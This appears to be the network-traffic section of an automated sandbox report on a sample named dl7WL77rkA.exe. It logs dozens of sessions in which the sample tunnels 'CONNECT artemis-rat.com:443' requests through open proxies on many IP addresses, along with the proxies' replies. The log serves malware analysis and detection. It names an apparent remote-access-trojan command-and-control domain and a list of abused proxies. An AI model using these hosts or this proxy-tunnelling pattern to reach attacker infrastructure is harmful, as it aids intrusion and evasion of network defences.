                                                                                                                                                                                                                                                            server: istio-envoy
                                                                                                                                                                                                                                                            connection: close
                                                                                                                                                                                                                                                            content-length: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            83192.168.2.55003993.190.142.57418903876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:37.897038937 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:38.191725016 CET  226  IN  HTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Length: 101
                                                                                                                                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                            Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/e694d447e9d328427188f733b14b6985


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            84192.168.2.55001147.56.110.20489893876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:37.898274899 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:38.208103895 CET  309  IN  HTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.16.1
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:15:33 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 157
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.16.1</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            85192.168.2.55005423.137.248.197803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:37.899364948 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:38.192060947 CET  309  IN  HTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.18.0
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 157
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            86192.168.2.550142162.241.158.204412743876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.922277927 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.452001095 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            87192.168.2.550006185.167.59.215803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.925945044 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.282680988 CET60INHTTP/1.0 200 Connection Established
                                                                                                                                                                                                                                                            Proxy-agent: Apache


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            88192.168.2.55013638.54.95.1990803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.929853916 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.150342941 CET39INHTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            89192.168.2.55003491.148.127.16280803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.934290886 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            90192.168.2.55006351.38.63.124272943876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.940043926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.592339039 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.498665094 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.405280113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            91192.168.2.549996203.95.198.14680803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.941464901 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.302336931 CET340INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.12.2
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Content-Length: 173
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>


                                                                                                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            92192.168.2.550048185.219.133.10631283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.942972898 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.290262938 CET327INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 166
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                                                                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            93192.168.2.550173172.67.181.85803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.971839905 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.126097918 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            94192.168.2.55007062.112.11.204264313876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.971918106 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.270011902 CET226INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Length: 101
                                                                                                                                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                            Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/e694d447e9d328427188f733b14b6985


                                                                                                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            95192.168.2.55010218.134.236.23131283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.972024918 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.266376972 CET116INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                                                                            Content-Length: 0


                                                                                                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            96192.168.2.550206172.67.182.38803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.972099066 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.126737118 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            97192.168.2.550139184.181.217.22041453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.972194910 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            98192.168.2.550211104.18.143.26803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.972210884 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.126688957 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
99 | 192.168.2.5 | 50179 | 104.20.233.70 | 80 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:37.972764969 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:38.127104044 CET | 316 | IN | HTTP/1.1 400 Bad Request
Server: cloudflare
Date: Mon, 11 Mar 2024 02:30:38 GMT
Content-Type: text/html
Content-Length: 155
Connection: close
CF-RAY: -
Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
100 | 192.168.2.5 | 50092 | 8.211.4.215 | 80 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:37.972887039 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:38.278597116 CET | 503 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/html; charset=us-ascii
Server: Microsoft-HTTPAPI/2.0
Date: Mon, 11 Mar 2024 02:30:38 GMT
Connection: close
Content-Length: 324
Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request - Invalid URL</h2><hr><p>HTTP Error 400. The request URL is invalid.</p></BODY></HTML>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
101 | 192.168.2.5 | 50178 | 104.18.44.93 | 80 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:37.973248959 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:38.127522945 CET | 316 | IN | HTTP/1.1 400 Bad Request
Server: cloudflare
Date: Mon, 11 Mar 2024 02:30:38 GMT
Content-Type: text/html
Content-Length: 155
Connection: close
CF-RAY: -
Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
102 | 192.168.2.5 | 50171 | 104.21.124.121 | 80 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:37.973455906 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:38.128079891 CET | 316 | IN | HTTP/1.1 400 Bad Request
Server: cloudflare
Date: Mon, 11 Mar 2024 02:30:38 GMT
Content-Type: text/html
Content-Length: 155
Connection: close
CF-RAY: -
Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
103 | 192.168.2.5 | 50061 | 65.109.163.154 | 80 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:37.973485947 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:38.356525898 CET | 316 | IN | HTTP/1.1 400 Bad Request
Server: cloudflare
Date: Mon, 11 Mar 2024 02:30:38 GMT
Content-Type: text/html
Content-Length: 155
Connection: close
CF-RAY: -
Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
104 | 192.168.2.5 | 50066 | 3.122.84.99 | 3128 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:37.973651886 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:38.278562069 CET | 116 | IN | HTTP/1.1 200 OK
Date: Mon, 11 Mar 2024 02:30:38 GMT
Server: nginx
Content-Type: text/plain
Content-Length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
105 | 192.168.2.5 | 50129 | 184.185.2.12 | 4145 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:37.975692987 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:38.576721907 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            106192.168.2.55015768.1.210.16341453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.983932972 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            107192.168.2.55010837.187.77.58134123876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.989428043 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            108192.168.2.55021747.88.3.1980803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.991018057 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.162166119 CET309INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.23.4
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 157
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.23.4</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            109192.168.2.549995110.93.227.2831283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.995230913 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.692940950 CET39INHTTP/1.1 200 Connection established


